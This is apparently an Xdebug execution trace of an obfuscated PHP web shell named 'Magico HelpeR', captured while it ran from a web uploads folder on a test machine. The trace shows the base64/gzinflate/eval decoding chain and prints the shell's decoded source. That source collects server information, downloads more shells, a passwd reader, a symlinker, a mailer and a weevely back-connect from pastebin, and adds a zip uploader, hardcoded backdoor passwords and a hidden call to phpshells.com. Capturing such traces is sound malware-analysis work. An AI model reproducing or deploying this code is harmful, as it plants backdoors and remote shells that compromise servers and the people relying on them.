Version: 3.1.0beta2 File format: 4 TRACE START [2023-02-13 01:32:11.739429] 1 0 1 0.000183 393512 1 3 0 0.000277 398424 {main} 1 /var/www/html/uploads/refo.php 0 0 1 A /var/www/html/uploads/refo.php 2 $UeXploiT = 'Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLElFYiUlFqeamcSnpCbnp6RqFJcUFaWWaag45hnkxRtXBOTkZ4akBmmCgTUA' 1 A /var/www/html/uploads/refo.php 3 $An0n_3xPloiTeR = '=MYqtL4B/bP3HIaBc7jfRza9TEChfPFl7vCVBGKjiPC+NGx83wE2r7kP5PQ8C+wz0eY+9Hm//p/i+//0szY2L223nz/3rGSlNOIKUPD0E5HjdVNUDfu3C46QSeSdaIb76NpK1xqIEYDCKmbrLSi9iM8sMc9zv10nYwiD5Mw0HAasr4AJqHOJ10egEdU218SxaP3Fz5DKz4m7n5DDbvY1PO++GXu+20BKLLgwhkVLxMU9HOnOR2xZSklLElQNn5OTiTQK51KK7TuMJ+KLlNDAsxWoFo0CRI1+AyH33b5dZYp4R5UGLx+XReSo1HDFc0Pjz1YAn6UYcj4HoSPwt6A3UpZAElDnRTpVcZXxONlI6GZIcwNyqykItqf1HOnUGWYYb3s5KR5ZejR7lZc9XsqLfq61e3QuWlg3pbdExVeZltsd+Yn67vUNrrqvwu9Qrs+88fpXce9g1eX2R3fr11szLP85evhr+4wvs6tE0pHuv+AQ/TredddvPuayRrtiV7Rh' 2 4 0 0.000341 398424 base64_decode 0 /var/www/html/uploads/refo.php 4 1 'Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLElFYiUlFqeamcSnpCbnp6RqFJcUFaWWaag45hnkxRtXBOTkZ4akBmmCgTUA' 2 4 1 0.000362 398616 2 4 R 'K-KPWK/VK*K-(J-.HKI,IEb%%\026ħ&秤j\024\024\025i8\031\033W\004g\006i5\000' 2 5 0 0.000388 398584 gzinflate 0 /var/www/html/uploads/refo.php 4 1 'K-KPWK/VK*K-(J-.HKI,IEb%%\026ħ&秤j\024\024\025i8\031\033W\004g\006i5\000' 2 5 1 0.000413 398744 2 5 R 'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($An0n_3xPloiTeR))))));' 2 6 0 0.000432 398552 htmlspecialchars_decode 0 /var/www/html/uploads/refo.php 4 1 'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($An0n_3xPloiTeR))))));' 2 6 1 0.000451 398744 2 6 R 'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($An0n_3xPloiTeR))))));' 2 7 0 0.000481 400296 eval 1 'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($An0n_3xPloiTeR))))));' /var/www/html/uploads/refo.php 4 0 3 8 0 0.000499 400296 strrev 0 /var/www/html/uploads/refo.php(4) : eval()'d code 1 1 '=MYqtL4B/bP3HIaBc7jfRza9TEChfPFl7vCVBGKjiPC+NGx83wE2r7kP5PQ8C+wz0eY+9Hm//p/i+//0szY2L223nz/3rGSlNOIKUPD0E5HjdVNUDfu3C46QSeSdaIb76NpK1xqIEYDCKmbrLSi9iM8sMc9zv10nYwiD5Mw0HAasr4AJqHOJ10egEdU218SxaP3Fz5DKz4m7n5DDbvY1PO++GXu+20BKLLgwhkVLxMU9HOnOR2xZSklLElQNn5OTiTQK51KK7TuMJ+KLlNDAsxWoFo0CRI1+AyH33b5dZYp4R5UGLx+XReSo1HDFc0Pjz1YAn6UYcj4HoSPwt6A3UpZAElDnRTpVcZXxONlI6GZIcwNyqykItqf1HOnUGWYYb3s5KR5ZejR7lZc9XsqLfq61e3QuWlg3pbdExVeZltsd+Yn67vUNrrqvwu9Qrs+88fpXce9g1eX2R3fr11szLP85evhr+4wvs6tE0pHuv+AQ/TredddvPuayRrtiV7Rh' 3 8 1 0.000528 404424 3 8 R 'AeAKH/UB2wok9Xic3VrrUttKEv4NVbzDRKHK5iy+cHGKEOwAwQE24RJjYAmhXCNpbCnWLRrJxmRzXmWf4fzff3v2vbZ7RvINORjZpyq1qgRLmp7ur3t6ZnpavWMEtlVZWtwxGNXx12YBJZrrBMwJykrA7oMCkrwhmkF9zoLy8cVZbmur9Dq3piwtGkHg5di30OyUlahTLuh5TEFWgRlYrJLffkFOaMvUXHLELI/VyD/JueFdGMyyeP6da5Pt/E5B0kKnQgQEblVX7xEe9CxWVlSqtVu+Gzp6TnMt198mqgWvAJZ88ltqtrhK8N/KGwBGLdNpl5WXjBXhUkj0iA+MKaQTPZdKa3RLFWh1sxMLQ61zwKHlbBOLNYM3SmWHe9SJ20dlrpU2pNTKTgGpJO3S4mPi0toqWS9uCmrSBHPlusxsGQEo41p6LCWpp5AxEAQ2/X03kvaSjIp91J3pE4RRYvisWVZwEPl2oeAZHpejorl2QamMDJsPYmiyhknMycy2' 3 9 0 0.000556 404392 base64_decode 0 /var/www/html/uploads/refo.php(4) : eval()'d code 1 1 'AeAKH/UB2wok9Xic3VrrUttKEv4NVbzDRKHK5iy+cHGKEOwAwQE24RJjYAmhXCNpbCnWLRrJxmRzXmWf4fzff3v2vbZ7RvINORjZpyq1qgRLmp7ur3t6ZnpavWMEtlVZWtwxGNXx12YBJZrrBMwJykrA7oMCkrwhmkF9zoLy8cVZbmur9Dq3piwtGkHg5di30OyUlahTLuh5TEFWgRlYrJLffkFOaMvUXHLELI/VyD/JueFdGMyyeP6da5Pt/E5B0kKnQgQEblVX7xEe9CxWVlSqtVu+Gzp6TnMt198mqgWvAJZ88ltqtrhK8N/KGwBGLdNpl5WXjBXhUkj0iA+MKaQTPZdKa3RLFWh1sxMLQ61zwKHlbBOLNYM3SmWHe9SJ20dlrpU2pNTKTgGpJO3S4mPi0toqWS9uCmrSBHPlusxsGQEo41p6LCWpp5AxEAQ2/X03kvaSjIp91J3pE4RRYvisWVZwEPl2oeAZHpejorl2QamMDJsPYmiyhknMycy2' 3 9 1 0.000591 408520 3 9 R '\001\n\037\001\n$xZRJ\022\rUD,pq\020\000\0016\022c`\t\\#il)-\032ds^e{{F\r9\030٧*\004K{zfzZc\004UYZ1\030f\001%\004\tJ\002!A}΂Ynk:,-\032Aط씕S.yLAV\031X~ANh\\r,?ɹ]\030̲xkNABB\004\004nUW\021\036,VVT[\033:zNs-&\005\000|[jJ\033\000F-i\025RH\017)\023=JktK\025hu\023\vCsl\02357Je{ԉGe6N\001$c*Y/n\nj\004sl\031\001(Zz,%1\020\0046}7}ԝ\023QbYVp\020v\031\036vA' 3 10 0 0.000687 404392 gzinflate 0 /var/www/html/uploads/refo.php(4) : eval()'d code 1 1 '\001\n\037\001\n$xZRJ\022\rUD,pq\020\000\0016\022c`\t\\#il)-\032ds^e{{F\r9\030٧*\004K{zfzZc\004UYZ1\030f\001%\004\tJ\002!A}΂Ynk:,-\032Aط씕S.yLAV\031X~ANh\\r,?ɹ]\030̲xkNABB\004\004nUW\021\036,VVT[\033:zNs-&\005\000|[jJ\033\000F-i\025RH\017)\023=JktK\025hu\023\vCsl\02357Je{ԉGe6N\001$c*Y/n\nj\004sl\031\001(Zz,%1\020\0046}7}ԝ\023QbYVp\020v\031\036vA' 3 10 1 0.000785 407496 3 10 R '\001\n$xZRJ\022\rUD,pq\020\000\0016\022c`\t\\#il)-\032ds^e{{F\r9\030٧*\004K{zfzZc\004UYZ1\030f\001%\004\tJ\002!A}΂Ynk:,-\032Aط씕S.yLAV\031X~ANh\\r,?ɹ]\030̲xkNABB\004\004nUW\021\036,VVT[\033:zNs-&\005\000|[jJ\033\000F-i\025RH\017)\023=JktK\025hu\023\vCsl\02357Je{ԉGe6N\001$c*Y/n\nj\004sl\031\001(Zz,%1\020\0046}7}ԝ\023QbYVp\020v\031\036vA\f\017bh' 3 11 0 0.000880 403368 gzinflate 0 /var/www/html/uploads/refo.php(4) : eval()'d code 1 1 '\001\n$xZRJ\022\rUD,pq\020\000\0016\022c`\t\\#il)-\032ds^e{{F\r9\030٧*\004K{zfzZc\004UYZ1\030f\001%\004\tJ\002!A}΂Ynk:,-\032Aط씕S.yLAV\031X~ANh\\r,?ɹ]\030̲xkNABB\004\004nUW\021\036,VVT[\033:zNs-&\005\000|[jJ\033\000F-i\025RH\017)\023=JktK\025hu\023\vCsl\02357Je{ԉGe6N\001$c*Y/n\nj\004sl\031\001(Zz,%1\020\0046}7}ԝ\023QbYVp\020v\031\036vA\f\017bh' 3 11 1 0.000971 406472 3 11 R 'xZRJ\022\rUD,pq\020\000\0016\022c`\t\\#il)-\032ds^e{{F\r9\030٧*\004K{zfzZc\004UYZ1\030f\001%\004\tJ\002!A}΂Ynk:,-\032Aط씕S.yLAV\031X~ANh\\r,?ɹ]\030̲xkNABB\004\004nUW\021\036,VVT[\033:zNs-&\005\000|[jJ\033\000F-i\025RH\017)\023=JktK\025hu\023\vCsl\02357Je{ԉGe6N\001$c*Y/n\nj\004sl\031\001(Zz,%1\020\0046}7}ԝ\023QbYVp\020v\031\036vA\f\017bhI̶x9' 3 12 0 0.001064 403368 gzuncompress 0 /var/www/html/uploads/refo.php(4) : eval()'d code 1 1 'xZRJ\022\rUD,pq\020\000\0016\022c`\t\\#il)-\032ds^e{{F\r9\030٧*\004K{zfzZc\004UYZ1\030f\001%\004\tJ\002!A}΂Ynk:,-\032Aط씕S.yLAV\031X~ANh\\r,?ɹ]\030̲xkNABB\004\004nUW\021\036,VVT[\033:zNs-&\005\000|[jJ\033\000F-i\025RH\017)\023=JktK\025hu\023\vCsl\02357Je{ԉGe6N\001$c*Y/n\nj\004sl\031\001(Zz,%1\020\0046}7}ԝ\023QbYVp\020v\031\036vA\f\017bhI̶x9' 3 12 1 0.001197 415688 3 12 R '\r\n\r\n\r\n.:! Magico HelpeR | PhpShells.Com :.\r\n\r\n\r\n\r\n
.:!~@# \r\n\r\n\r\n.:! Magico HelpeR | PhpShells.Com :.\r\n\r\n\r\n\r\n
.:!~@# Magico Helper #@~!:.\r\n
\r\n
\r\n.: Server InFo :.
\r\n\r\n---------------------------------------------------------------------------------------
\r\n[#] Server Software : ".$_SERVER[\'SERVER_SOFTWARE\']."
";\r\necho "[#] Server Admin : ".$_SERVER[\'SERVER_ADMIN\']."
";\r\necho "[#] User : ".get_current_user()."
";\r\necho "[#] Server IP : ".$_SERVER[\'SERVER_ADDR\']."
";\r\necho "[#] Your IP : ".$_SERVER["REMOTE_ADDR"]."
";\r\necho "[#] Uname : ".php_uname()."
";\r\necho "[#] Php version : ".phpversion()."
";\r\necho "[#] Dir : ".getcwd()."
";\r\n////////////////////////////////////\r\necho "[#] Safe Mode : ";\r\n\tif(@ini_get(\'safe_mode\') or strtolower(@ini_get(\'safe_mode\')) == \'on\'){\r\n\t\techo "On";\r\n\t\t\r\n\t}else{ echo"Off"; }\r\necho "
";\r\n//////////////////////////////////\r\necho "[#] Curl :";\r\n\tif(function_exists("curl_version")){\r\n\t\techo"On";\r\n\t}else{ echo"Off";}\r\n\r\necho " - [#] Perl :";\r\n\tif(function_exists("perl -h")){\r\n\t\techo"On";\r\n\t}else{ echo"Off";}\r\n\r\necho " - [#] Python :";\r\n\tif(function_exists("python -h")){\r\n\t\techo"On";\r\n\t}else{ echo"Off";}\r\n\t\r\necho " - [#] Bash :";\r\n\tif(function_exists("bash -h")){\r\n\t\techo"On";\r\n\t}else{ echo"Off";}\r\n\r\necho " - [#] Mysql :";\r\n\tif(function_exists("mysql_connect")){\r\n\t\techo"On";\r\n\t}else{ echo"Off";}\r\n\t\r\necho " - [#] Mssql :";\r\n\tif(function_exists("mssql_connect")){\r\n\t\techo"On";\r\n\t}else{ echo"Off";}\r\n\r\necho " - [#] Oracle :";\r\n\tif(function_exists("ocilogon")){\r\n\t\techo"On";\r\n\t}else{ echo"Off";}\r\n\t\r\necho " - [#] Postgrase :";\r\n\tif(function_exists("pg_connect")){\r\n\t\techo"On";\r\n\t}else{ echo"Off";}\r\n\r\n//////////////////////////////////\r\necho "
[#] Disable_functions : ";\r\n\r\n\t$disable_funs = @ini_get(\'disable_functions\');\r\n\t$arr = explode(\',\', $disable_funs);\r\n\tforeach($arr as $fun){\r\n\t\techo "$fun"." - ";\r\n\t}\r\n\r\n\r\n/* or\r\n\t$funs =array("system","exec","shell_exec","passthru","ln","copy","symlink","show_source","mail");\r\n\t\tforeach($funs as $fun){\r\n\t\t\tif(!function_exists($fun)){\r\n\t\t\t\techo $fun." - ";\r\n\t\t\t}\r\n\t\t}*/\r\n//////////////////////////////\r\necho"
";\r\necho"---------------------------------------------------------------------------------------------------------------------------------------------------

";\r\necho\'
\r\n[#] Tools Grabber : \r\n\r\n\';\r\n/////////////////////////////////////////////////////////////////\r\nif(isset($_POST[\'get\'])){\r\n\tswitch($_POST[\'tools\']){\r\n\t\r\n\t\tcase "x shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=vYzbTTs8\',\'oop.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "2015priv8bypass":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=5CRWPuPN\',\'r00t.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "hidden uploader":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=cf8nikzF\',\'upx.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "awso shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=0USmsjpW\',\'awso.php\');\r\n\t\tbreak;\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "mass":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=dWAksQgN\',\'mass.php\');\r\n\t\tbreak;\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "/etc/passwd":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=KbwUY0aR\',\'passwd.php\');\r\n\t\tbreak;\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "k2ll33d shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=8mwwA4V2\',\'k.php\');\r\n\t\tbreak;\t\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "fwso shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=f2VWCsNY\',\'fwso.php\');\r\n\t\tbreak;\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "adminer":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=BZHXtZqu\',\'adminer.php\');\r\n\t\tbreak;\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "backconnect weevely":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=6YkfqzQ1\',\'bc.php\');\r\n\t\tbreak;\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "turbo cpanel":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=svbEfUPF\',\'turbo.php\');\r\n\t\tbreak;\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "symlinker":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=9zQFua4Z\',\'symv4.php\');\r\n\t\tbreak;\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "server users":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=5VKD1nEk\',\'users.php\');\r\n\t\tbreak;\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "mailer":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=9zzgByV6\',\'wp-mailer.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "Magico pws":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=r2mpC2tL\',\'pws.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "safe mode":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=Te1e1uhA\',\'php.ini\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "404 shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=0c3TeKDu\',\'404.php\');\r\n\t\tbreak;\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "wp mass info changer":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=uNqDPzjR\',\'wp-masser.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "jo mass info changer":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=gvEdgkyK\',\'jo-masser.php\');\r\n\t\tbreak;\r\n\t\t\t\t\r\n\t\r\n\t\t} // switch end\r\n}// end if\r\n////////////////////////////////////////////////////////////////\r\n// by INJECTOR_MA\r\nfunction phpshells($input,$output){\r\n\t@mkdir(\'phpshells\');\r\n\t@chdir(\'./phpshells\');\r\n\t\r\n\tif(!file_exists($output)){\r\n\t\t\r\n\t$cn = @file_get_contents($input);\r\n\t$save = fopen("$output","a+"); fwrite($save,@file_get_contents($input)); fclose($save);\r\n\treturn "
[#]DoNe: Go to Here ";\r\n\t}else{ return "
[#] Allready Here : Go to Here "; }\r\n\t\r\n}\t\t\t\t\r\n///////////////////////////////////////////////////////////////\r\n\r\n?>\r\n\r\n



\r\n[#] Please\r\nNotice :
 the password of the [ weevely backdoor ] is 123456\r\n
\r\n[#] the user of [ fwso shell\r\n] is magico and the\r\npassword is xmagico\r\n\r\n
\r\n[#] to view the hidden uplouder write (up.php?x=x)
\r\n[#] The Pass of 404 shell is katibprv8\r\n
...::::::: PhpShells.Com ::::::::...\r\n\r\n\r\n\r\n\';?>\r\n\r\n\';\r\n echo \'\';\r\n if( $_POST[\'_upl\'] == "Upload" ) {\r\n $file = $_FILES[\'file\'][\'name\'];\r\n if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) {\r\n $zip = new ZipArchive;\r\n if ($zip->open($file) === TRUE) {\r\n $zip->extractTo(\'./\');\r\n $zip->close();\r\n echo \'Yükleme Başarılı\';\r\n } else {\r\n echo \'Yüklenmedi.\';\r\n }\r\n }else{\r\n echo \'Basarisiz

\';\r\n }\r\n }\r\n}\r\n?>' /var/www/html/uploads/refo.php(4) : eval()'d code 1 0 4 14 0 0.001672 458704 set_time_limit 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 29 1 0 4 14 1 0.001691 458768 4 14 R FALSE 4 15 0 0.001706 458736 error_reporting 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 30 1 0 4 15 1 0.001721 458776 4 15 R 22527 4 16 0 0.001736 458736 get_current_user 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 33 0 4 16 1 0.001775 458776 4 16 R 'osboxes' 4 17 0 0.001792 458744 php_uname 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 36 0 4 17 1 0.001807 458856 4 17 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 4 18 0 0.001826 458744 phpversion 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 37 0 4 18 1 0.001839 458808 4 18 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1' 4 19 0 0.001855 458744 getcwd 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 38 0 4 19 1 0.001869 458792 4 19 R '/var/www/html/uploads' 4 20 0 0.001885 458744 ini_get 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 41 1 'safe_mode' 4 20 1 0.001899 458776 4 20 R FALSE 4 21 0 0.001912 458744 ini_get 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 41 1 'safe_mode' 4 21 1 0.001926 458776 4 21 R FALSE 4 22 0 0.001939 458744 strtolower 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 41 1 FALSE 4 22 1 0.001952 458776 4 22 R '' 4 23 0 0.001966 458744 function_exists 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 48 1 'curl_version' 4 23 1 0.001981 458784 4 23 R TRUE 4 24 0 0.001994 458744 function_exists 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 53 1 'perl -h' 4 24 1 0.002008 458784 4 24 R FALSE 4 25 0 0.002021 458744 function_exists 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 58 1 'python -h' 4 25 1 0.002035 458784 4 25 R FALSE 4 26 0 0.002048 458744 function_exists 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 63 1 'bash -h' 4 26 1 0.002062 458784 4 26 R FALSE 4 27 0 0.002075 458744 function_exists 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 68 1 'mysql_connect' 4 27 1 0.002089 458784 4 27 R FALSE 4 28 0 0.002101 458744 function_exists 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 73 1 'mssql_connect' 4 28 1 0.002115 458784 4 28 R FALSE 4 29 0 0.002127 458744 function_exists 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 78 1 'ocilogon' 4 29 1 0.002145 458784 4 29 R FALSE 4 30 0 0.002157 458744 function_exists 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 83 1 'pg_connect' 4 30 1 0.002179 458784 4 30 R FALSE 4 31 0 0.002192 458744 ini_get 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 90 1 'disable_functions' 4 31 1 0.002207 459224 4 31 R 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,' 3 A /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 90 $disable_funs = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,' 4 32 0 0.002254 459192 explode 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 91 2 ',' 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,' 4 32 1 0.002278 461664 4 32 R [0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => ''] 3 A /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 91 $arr = [0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => ''] 4 33 0 0.002357 461704 base64_decode 0 /var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code 261 1 'aHR0cHM6Ly9waHBzaGVsbHMuY29tL2hpZGUvYWRkLnBocD9saW5rPWVhc3ljb2RlcjovLw==' 4 33 1 0.002376 461848 4 33 R 'https://phpshells.com/hide/add.php?link=easycoder://' 3 13 1 0.002395 461704 2 7 1 0.002406 420288 0.002429 339032 TRACE END [2023-02-13 01:32:11.741731]